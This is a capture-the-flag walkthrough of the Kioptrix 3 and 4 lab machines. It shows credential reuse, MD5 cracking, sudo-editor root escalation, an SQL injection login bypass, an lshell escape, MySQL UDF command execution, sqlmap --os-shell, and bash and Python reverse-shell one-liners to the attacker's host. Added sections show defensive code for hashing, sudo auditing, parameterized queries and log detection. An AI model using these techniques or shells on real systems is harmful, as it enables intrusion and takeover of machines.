Local MySQL login

$ mysql -u root -p
mysql -u root -p
Enter password: fuckeyou

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| gallery |
| mysql |
+--------------------+
3 rows in set (0.00 sec)

mysql> use gallery;
use gallery;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------------+
| Tables_in_gallery |
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
7 rows in set (0.00 sec)

mysql> select * from dev_accounts;
select * from dev_accounts;
+----+------------+----------------------------------+
| id | username | password |
+----+------------+----------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.10 sec)

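phpMyAdmin login

With the credentials root / fuckeyou, the phpmyadmin login succeeds.

The dev_accounts table holds two entries, presumably the login passwords of the users dreg and loneferret.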

dreg 0d3eccfb887aabd50f243b3f155c0f85

loneferret 5badcaf789d3d1d09794d8f021f40f0e

Cracking the MD5 hash gives loneferret's password: starwars.
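
The dev_accounts values can be reversed this way because they are plain MD5 digests with no salt. As an added example, not code from the original post or from the application, the following shows a salted PBKDF2 replacement that upgrades each legacy record at the user's next successful login; the record format, the iteration count and the account names are assumptions, and the sample passwords are constructed.

```python
import hashlib
import hmac
import os

# PBKDF2-HMAC-SHA256 work factor (assumption; tune it to your hardware).
ITERATIONS = 600_000


def legacy_md5(password):
    """The scheme the table uses today: one unsalted MD5 pass, hex-encoded."""
    return hashlib.md5(password.encode()).hexdigest()


def new_hash(password, salt=None):
    """Salted record in the form 'pbkdf2$<iterations>$<salt hex>$<digest hex>'."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify(password, stored):
    """Check a password against either record format with a constant-time compare."""
    if stored.startswith("pbkdf2$"):
        _, iterations, salt_hex, digest_hex = stored.split("$")
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iterations))
        return hmac.compare_digest(digest.hex(), digest_hex)
    return hmac.compare_digest(legacy_md5(password), stored)


def login(accounts, username, password):
    """Verify the password and replace a legacy MD5 record on success."""
    stored = accounts.get(username)
    if stored is None or not verify(password, stored):
        return False
    if not stored.startswith("pbkdf2$"):
        accounts[username] = new_hash(password)
    return True


def demo():
    # Constructed accounts: two users who happen to share one password.
    accounts = {"alice": legacy_md5("constructed-pass-1"),
                "bob": legacy_md5("constructed-pass-1")}
    # Unsalted MD5 is deterministic, so equal passwords give equal digests,
    # which is what makes precomputed lookups work against such a table.
    same_before = accounts["alice"] == accounts["bob"]
    logins_ok = (login(accounts, "alice", "constructed-pass-1")
                 and login(accounts, "bob", "constructed-pass-1"))
    return {
        "same_digest_before": same_before,
        "logins_ok": logins_ok,
        "upgraded": all(v.startswith("pbkdf2$") for v in accounts.values()),
        "same_record_after": accounts["alice"] == accounts["bob"],
        "wrong_password": login(accounts, "alice", "not-the-password"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```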

SSH login and privilege escalation

root@kali:~/Desktop# ssh loneferret@192.168.214.140
The authenticity of host '192.168.214.140 (192.168.214.140)' can't be established.
RSA key fingerprint is SHA256:NdsBnvaQieyTUKFzPjRpTVK6jDGM/xWwUi46IR/h1jU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.214.140' (RSA) to the list of known hosts.
loneferret@192.168.214.140's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)

The login succeeds; run sudo -l.

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht

The sudo ht command mentioned earlier is allowed.

loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.

The error is a terminal colour issue; run export TERM=xterm.

loneferret@Kioptrix3:~# echo $TERM
xterm-256color
loneferret@Kioptrix3:~# export TERM=xterm
loneferret@Kioptrix3:~# echo $TERM
xterm

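After that, sudo ht runs normally. ht is an editor, so sudo ht can modify files with root privileges, which is enough to escalate.

Editing /etc/passwd

Press F3 to open /etc/passwd, change the current user's uid to 0 (root privileges), then save and exit. After logging in again over SSH you have root privileges.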

Editing /etc/sudoers

Add bash to the commands the current user is allowed to run with sudo, which gives root privileges.

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
(root) NOPASSWD: /bin/bash
loneferret@Kioptrix3:~$ sudo bash
root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)

Or change the entry directly to loneferret ALL=(ALL) ALL to be allowed to run every command with sudo.

loneferret@Kioptrix3:~$ sudo -l
[sudo] password for loneferret:
User loneferret may run the following commands on this host:
(ALL) ALL
loneferret@Kioptrix3:~$ sudo su
root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)
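
From the defender's side, both the sudo rule that allows ht and the result of the /etc/passwd edit can be checked for. The following is an added example, not part of the original write-up: it audits `sudo -l` output for programs that can write files or start a shell as root, and /etc/passwd for extra uid 0 accounts. The program lists and function names are assumptions, and the passwd sample is constructed from the entries shown earlier.

```python
import os
import re

# Programs that can write arbitrary files when run as root (illustrative list).
FILE_WRITERS = {"ht", "vi", "vim", "nano", "emacs", "ed", "tee", "cp", "dd"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# One rule line of `sudo -l`: "(runas) [TAG: ...] cmd[, cmd ...]"
RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# `sudo -l` output as shown in the write-up.
SUDO_L_SAMPLE = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""

# Constructed: /etc/passwd entries after the uid edit described above.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
loneferret:x:0:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash
"""


def audit_sudo_l(text):
    """Return (severity, message) findings for the rule lines of `sudo -l` output."""
    findings = []
    for line in text.splitlines():
        match = RULE.match(line.strip())
        if not match:
            continue  # header lines and anything that is not a rule
        runas = match.group("runas")
        how = ("without a password" if "NOPASSWD:" in match.group("tags")
               else "with a password")
        for cmd in (c.strip() for c in match.group("cmds").split(",")):
            if not cmd:
                continue
            if cmd.startswith("!"):
                # A negation denies one exact path; it does not stop another
                # allowed program from doing the same job.
                findings.append(("info", f"negated entry {cmd} denies only that exact path"))
            elif cmd == "ALL":
                findings.append(("high", "ALL commands allowed"))
            else:
                name = os.path.basename(cmd.split()[0])
                if name in SHELLS:
                    findings.append(("high", f"{cmd} gives a shell as {runas} {how}"))
                elif name in FILE_WRITERS:
                    findings.append(("high", f"{cmd} runs as {runas} {how} and can "
                                             "rewrite /etc/passwd or /etc/sudoers"))
    return findings


def audit_passwd(text):
    """Flag every account other than root that has uid 0."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # not a passwd entry
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            findings.append(("high", f"account {name} has uid 0"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_sudo_l(SUDO_L_SAMPLE) + audit_passwd(PASSWD_SAMPLE):
        print(f"[{severity}] {message}")
```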

Other notes

The application under /gallery on the site is named Gallarific; a search shows that it has an SQL injection vulnerability:
https://www.exploit-db.com/exploits/15891/

The user passwords can be obtained directly through the SQL injection.

Kioptrix#4

  • Target IP 192.168.214.142
  • Kali IP 192.168.214.139

nmap scan

root@kali:~# nmap -sS -A 192.168.214.142 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-23 08:43 EDT
Nmap scan report for 192.168.214.142
Host is up (0.00024s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:12:42:B6 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 10h00m01s, deviation: 2h49m43s, median: 8h00m00s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2018-10-23T16:43:33-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.214.142

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.05 seconds

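Ports 22, 80, 139 and 445 are open, and the scan also reveals the SMB version; a search turned up no usable vulnerability for it

The home page is a user login form. I first tried weak credentials such as admin and a universal-password (SQL injection) string

When the username or password is wrong, the page shows: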

isB6aT.png

Using admin'or'1'='1 as the password:

isBcIU.png

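The login is reported as successful, but there is no admin account

While running the tests above I was also scanning directories with dirbuster, which found two directories, john and robert, along with PHP pages. I guessed these were usernames and tried logging in with them; it worked, and the page displayed the account name and password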

Username : john
Password : MyNameIsJohn

Username : robert
Password : ADGAdsafdfwt4gadfga==
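
The admin'or'1'='1 bypass above works when the login query is assembled by string concatenation. The Python below is an added example, not the target's checklogin.php: it reproduces the flaw against an in-memory SQLite stand-in and shows a bound-parameter, hashed-password check beside it. The query shape, the table columns and the sample rows are assumptions; the field names myusername and mypassword are the login form's.

```python
import hashlib
import hmac
import os
import sqlite3

def hash_pw(password, salt):
    # Salted PBKDF2 so the table never holds a readable password.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """In-memory stand-in for the members table (constructed rows, assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT PRIMARY KEY, "
                 "password TEXT, salt BLOB, pw_hash BLOB)")
    for user, pw in [("john", "constructed-pw-1"), ("robert", "constructed-pw-2")]:
        salt = os.urandom(16)
        conn.execute("INSERT INTO members VALUES (?, ?, ?, ?)",
                     (user, pw, salt, hash_pw(pw, salt)))
    return conn

def vulnerable_login(conn, myusername, mypassword):
    # Assumed flawed pattern: user input pasted into the SQL text.
    # AND binds tighter than OR, so a trailing  or '1'='1'  matches every row.
    sql = ("SELECT username FROM members "
           "WHERE username='%s' AND password='%s'" % (myusername, mypassword))
    return [row[0] for row in conn.execute(sql)]

def hardened_login(conn, myusername, mypassword):
    # The placeholder binds the username as data, never as SQL syntax.
    row = conn.execute("SELECT salt, pw_hash FROM members WHERE username = ?",
                       (myusername,)).fetchone()
    if row is None:
        return False
    # The password never reaches the query; compare hashes in constant time.
    return hmac.compare_digest(hash_pw(mypassword, row[0]), row[1])

if __name__ == "__main__":
    db = make_db()
    payload = "admin'or'1'='1"
    print("concatenated query matched:", vulnerable_login(db, "john", payload))
    print("bound query accepted payload:", hardened_login(db, "john", payload))
```
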

Trying an SSH login with these credentials works

root@kali:~/Desktop# ssh john@192.168.214.143
The authenticity of host '192.168.214.143 (192.168.214.143)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.214.143' (RSA) to the list of known hosts.
john@192.168.214.143's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ ?
cd clear echo exit help ll lpath ls
john:~$

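However, the shell provided is not a normal one; it only allows the commands cd clear echo exit help ll lpath ls

A search shows this is Lshell: https://www.aldeid.com/wiki/Lshell

echo os.system('/bin/bash') bypasses the lshell restrictions and gives a bash shell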

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
john@Kioptrix4:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 8.04.3 LTS
Release: 8.04
Codename: hardy

Reading the source of the pages in the web root reveals the database username and password

john@Kioptrix4:/var/www$ cat checklogin.php 
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

The credentials are for the MySQL root user, so try a UDF for privilege escalation

john@Kioptrix4:~$ mysql -uroot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
ERROR 1125 (HY000): Function 'sys_exec' already exists

The sys_exec function already exists, so use it directly to add the current user to the admin group

Older Linux versions are an exception:

You can create a new user simply using the adduser(8) command.

To make it a user capable of performing sudo, add him to the sudo group using either of the following commands:

sudo usermod -a -G sudo <username>
sudo adduser <username> sudo
This works because the sudo group is predefined in /etc/sudoers. Note though that older versions of Ubuntu will use admin as group instead:

Until Ubuntu 11.10, the Unix group for administrators with root privileges through sudo had been admin. Starting with Ubuntu 12.04 LTS, it is now sudo, for compatibility with Debian and sudo itself. However, for backwards compatibility, admin group members are still recognized as administrators

Run the privilege escalation command

mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL |
+--------------------------------------+
1 row in set (0.08 sec)

mysql> quit
Bye
john@Kioptrix4:~$ sudo -s
[sudo] password for john:
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
root:~$ id
*** unknown command: id
root:~$
root:~$ quit
john@Kioptrix4:~$ sudo su
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
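
The escalation above leaves recognizable statements in MySQL's query log when logging is enabled. The Python below is an added example, not part of the original write-up: it runs three detection rules over a constructed sample written in the style of a general query log. The log lines, rule names and regexes are assumptions made for illustration.

```python
import re

# Constructed sample in the style of a MySQL general query log (not from the target).
SAMPLE_LOG = """\
181024 17:55:02     1 Connect   root@localhost on
181024 17:55:09     1 Query     use mysql
181024 17:55:31     1 Query     create function sys_exec returns integer soname 'lib_mysqludf_sys.so'
181024 17:56:10     1 Query     select sys_exec('usermod -a -G admin john')
181024 17:57:44     2 Query     SELECT * FROM members WHERE username='john'
"""

# Hypothetical rule set: (rule name, pattern applied to each log line).
RULES = [
    # A shared object being registered as a user-defined function.
    ("udf-registration",
     re.compile(r"\bcreate\s+(aggregate\s+)?function\b.*\bsoname\b", re.I)),
    # Calls into lib_mysqludf_sys helpers that run OS commands.
    ("udf-command-exec", re.compile(r"\bsys_(exec|eval)\s*\(", re.I)),
    # Group-membership changes that grant sudo rights (admin on older Ubuntu).
    ("group-change",
     re.compile(r"\b(usermod|adduser|gpasswd)\b.*\b(admin|sudo)\b", re.I)),
]

def scan(log_text):
    """Return [(line_number, [rule names])] for every line that trips a rule."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        hits = [name for name, rx in RULES if rx.search(line)]
        if hits:
            findings.append((lineno, hits))
    return findings

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

The command only had root's effect because the MySQL account had no password and the server process could change system groups; a password on the MySQL root account and a mysqld running as an unprivileged user remove both preconditions.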
  • Another approach

The login page has a SQL injection, so sqlmap can be used

python sqlmap.py -u http://192.168.214.143/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" \
-p mypassword --os-shell

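This yields a webshell, and a reverse shell can be spawned from there

I ran into a problem here: the reverse shell kept failing, and a one-line webshell I wrote myself did not work either

Trying it in the real shell after logging in over SSH also failed, surprisingly. It turned out to be a problem with the system: there is no /dev/tcp file... Python works, though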

root@Kioptrix4:/dev# bash -i >& /dev/tcp/192.168.214.139/7777 0>&1
bash: /dev/tcp/192.168.214.139/7777: No such file or directory
os-shell> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.214.139",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
do you want to retrieve the command standard output? [Y/n/a] y

The one-liner could not be written because of missing permissions; the one sqlmap wrote was presumably written with MySQL's privileges

root@kali:~# nc -lvvp 7777
listening on [any] 7777 ...
192.168.214.143: inverse host lookup failed: Unknown host
connect to [192.168.214.139] from (UNKNOWN) [192.168.214.143] 35105
/bin/sh: can't access tty; job control turned off
$ ls -al
total 76
drwxr-xr-x 5 root root 4096 Oct 24 17:58 .
drwxr-xr-x 14 root root 4096 Feb 4 2012 ..
-rw-r--r-- 1 root root 1477 Feb 6 2012 checklogin.php
-rw-r--r-- 1 root root 298 Feb 4 2012 database.sql
drwxr-xr-x 2 root root 4096 Feb 6 2012 images
-rw-r--r-- 1 root root 1255 Feb 6 2012 index.php
drwxr-xr-x 2 root root 4096 Feb 4 2012 john
-rw-r--r-- 1 root root 176 Feb 4 2012 login_success.php
-rw-r--r-- 1 root root 78 Feb 4 2012 logout.php
-rw-r--r-- 1 root root 606 Feb 6 2012 member.php
drwxr-xr-x 2 root root 4096 Feb 4 2012 robert
-rw-rw-rw- 1 root root 927 Oct 24 17:58 tmpbdges.php
$ touch a.php
touch: cannot touch `a.php': Permission denied